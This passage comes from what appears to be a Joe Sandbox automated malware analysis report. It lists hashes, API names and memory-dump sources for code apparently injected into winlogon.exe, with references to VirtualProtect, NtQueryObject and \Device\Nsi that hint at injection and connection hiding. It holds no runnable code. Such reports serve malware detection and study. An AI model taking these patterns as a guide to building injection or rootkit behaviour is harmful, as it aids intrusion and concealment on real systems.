                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                            • Instruction ID: 63877a1f626742783a368f55fc0a60ee853d92ff197a70e3001fe82e698bde16
                                            • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                            • Instruction Fuzzy Hash: B8D0C936B3165483F3019B11D855BD66228FB98705FC04009E949826949F7DC25ACB92

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 409 1ca7d21f370-1ca7d21f39f VirtualProtect
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                            • Instruction ID: 96736f0284182aa4837be0ebcb41d10c413a553dbe389820e9d30482321e3cc7
                                            • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                            • Instruction Fuzzy Hash: CFD0C936B3164483F3019B11D845BD56228BB98705FC04005E949826948F7DC25ACB92

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 408 1ca7d1ef370-1ca7d1ef39f VirtualProtect
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                            • Instruction ID: bead2ac1358e17f089f294fb4c756c1d3e3800fd4e757aed294e48ae8c095ac3
                                            • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                            • Instruction Fuzzy Hash: 58D01236B32644C3F301DB51D855BD67729FB98705FC04005E94982694DF7DC259CF92
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction ID: 1b76cae57bb5ede7a876367774aa743c8adcc59447000feee719665bdef6a494
                                            • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction Fuzzy Hash: 2EB17033A5879886FB568F25D400BDAB3A5FB84B99F845016DE09677A4DE36CC42C3C3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction ID: c99db775f95ad49f63960b31de7368144e072af91cd50a58f6ca275a580b9347
                                            • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction Fuzzy Hash: 26B16F33A5479882FB669F25D400BD9B3A6FB44B98F94901AEE0953794DA37CD42C3C3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction ID: 4dfdd766fcca42df98d61a964e565b1f4d34243f24fb4b18c15cbeb28bb14d75
                                            • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction Fuzzy Hash: 4EB16D73A5079982FB5A8F26D400BD9B3A5FF44F8AF845016EE4993795DE36C980C383
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction ID: b325f62a8c6918293bf4545d48a3dff6da009b34d28f8e70c2f43cb220add978
                                            • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction Fuzzy Hash: 2E31B073600B8486FB618F60E840BEE7360FB84708F84402ADA4E4BB94DF39C149C792
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction ID: b08fb8c50f464ed379093d9854270921c734b56c222001deaac93b1b99a5f4bc
                                            • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction Fuzzy Hash: 65319273604B8496FB618F60E880BED7370FB84758F84812ADA4E47B94DF39C649C796
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction ID: e36a2929517430e398b6d0cc2adb5a53015578127c4b9c6c466daf903339ad4f
                                            • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction Fuzzy Hash: FF319E73645B84C6FB618F60E850BEE7360FB84748F84412ADA4E47B99EF39C648C752
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction ID: 3da2407669b8f480f8f756b28b7d9b8c2941b422362866d82381332b9e319530
                                            • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction Fuzzy Hash: 3B419B33654B8486EB61CF24E8407DE73A4FB88758F940215EA9D47BA8DF39C156CB82
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction ID: e21dcb0928847e0ad1ab47b3b2793bd05313454e03d703009cfb91f4e3bedbc5
                                            • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction Fuzzy Hash: FD41C537614F8486E761CF24E8407DE73A4FB88758F904119EA9D47B94DF39C146CB82
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction ID: 4d4afe448e738d7e3fa105810fe858d9c604cd282fc7a32b4601bf5b3b83ad03
                                            • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction Fuzzy Hash: 4541AC33654B8486FB61CF24E840BDE77A4FB88758F900225EA8D47B99DF39C245CB42
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID:
                                            • API String ID: 1164774033-0
                                            • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction ID: fa24c3d413903ccc1a3935427bc08479c9ec404d9b3963e817dc7376bfee203b
                                            • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction Fuzzy Hash: 7FA1E433B4478849FB229B759448BED7BA0FB8179DF9841159E4837699CA36C043E7C3
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID:
                                            • API String ID: 1164774033-0
                                            • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction ID: 45d124b7b65d76756e98c7d09d685b6f4212555c67c952a88febd89221c6fea2
                                            • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction Fuzzy Hash: 1AA1E633B4478889FB22DB759440BED7BA0BB8179CF9881199E5527A95CA3BC043C7C3
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID:
                                            • API String ID: 1164774033-0
                                            • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction ID: bca9c8bf826c505011b38fd6b5f6bfe9104125b42424f6945c05f756906d2787
                                            • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction Fuzzy Hash: C8A10633B4478849FB229B75E440BED7BA0BB81B9DF9C4115DA492BA95DA36C041C343
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction ID: 2ffd8be48935f38640984e0e891f6a1c018a3ddb3dfbf4d3b2fca621978af583
                                            • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction Fuzzy Hash: 14113C36B51F088AFB00CF60E8547E833A4FB59758F840E21DA6D86BA4EF78C1558382
                                            APIs
                                              • Part of subcall function 000001CA7D29D220: HeapAlloc.KERNEL32(?,?,00000000,000001CA7D29C987), ref: 000001CA7D29D275
                                              • Part of subcall function 000001CA7D2A0EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001CA7D2A0EEB
                                            • FindFirstFileExW.KERNEL32 ref: 000001CA7D29DB99
                                              • Part of subcall function 000001CA7D29D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001CA7D29674A), ref: 000001CA7D29D2B6
                                              • Part of subcall function 000001CA7D29D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001CA7D29674A), ref: 000001CA7D29D2C0
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2436724071-0
                                            • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                            • Instruction ID: 3ea8621b35377627fdacd7b1a3c1b8087c9e356d7a72d09c49ba8589577fb77f
                                            • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                            • Instruction Fuzzy Hash: B8813533B4478485FB22DB31A544BDEB791FB847A9F884125AE9D27795CE3AC04393C2
                                            APIs
                                              • Part of subcall function 000001CA7D21D220: HeapAlloc.KERNEL32(?,?,00000000,000001CA7D21C987), ref: 000001CA7D21D275
                                              • Part of subcall function 000001CA7D220EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001CA7D220EEB
                                            • FindFirstFileExW.KERNEL32 ref: 000001CA7D21DB99
                                              • Part of subcall function 000001CA7D21D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001CA7D21674A), ref: 000001CA7D21D2B6
                                              • Part of subcall function 000001CA7D21D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001CA7D21674A), ref: 000001CA7D21D2C0
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2436724071-0
                                            • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                            • Instruction ID: 176bc6c17da58cb777e97b847668772cea4fa243f14036d6c43020da7c5fc00a
                                            • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                            • Instruction Fuzzy Hash: C181E733B44788C5FB22DB21A550BDE7791FB447D8F888119AEA907B95DA3BC04387C2
                                            APIs
                                              • Part of subcall function 000001CA7D1ED220: HeapAlloc.KERNEL32(?,?,00000000,000001CA7D1EC987), ref: 000001CA7D1ED275
                                              • Part of subcall function 000001CA7D1F0EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001CA7D1F0EEB
                                            • FindFirstFileExW.KERNEL32 ref: 000001CA7D1EDB99
                                              • Part of subcall function 000001CA7D1ED2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001CA7D1E674A), ref: 000001CA7D1ED2B6
                                              • Part of subcall function 000001CA7D1ED2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001CA7D1E674A), ref: 000001CA7D1ED2C0
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2436724071-0
                                            • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                            • Instruction ID: 5205a7403cca9f1548dad89f04e5f688a0c075462e664ab97e36f28573c5fae2
                                            • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                            • Instruction Fuzzy Hash: 5A81F733B4478485FB22DB22E440BDEB791FB85B99F8C4125AE99077D5DE3AC1418743
                                            Memory Dump Source
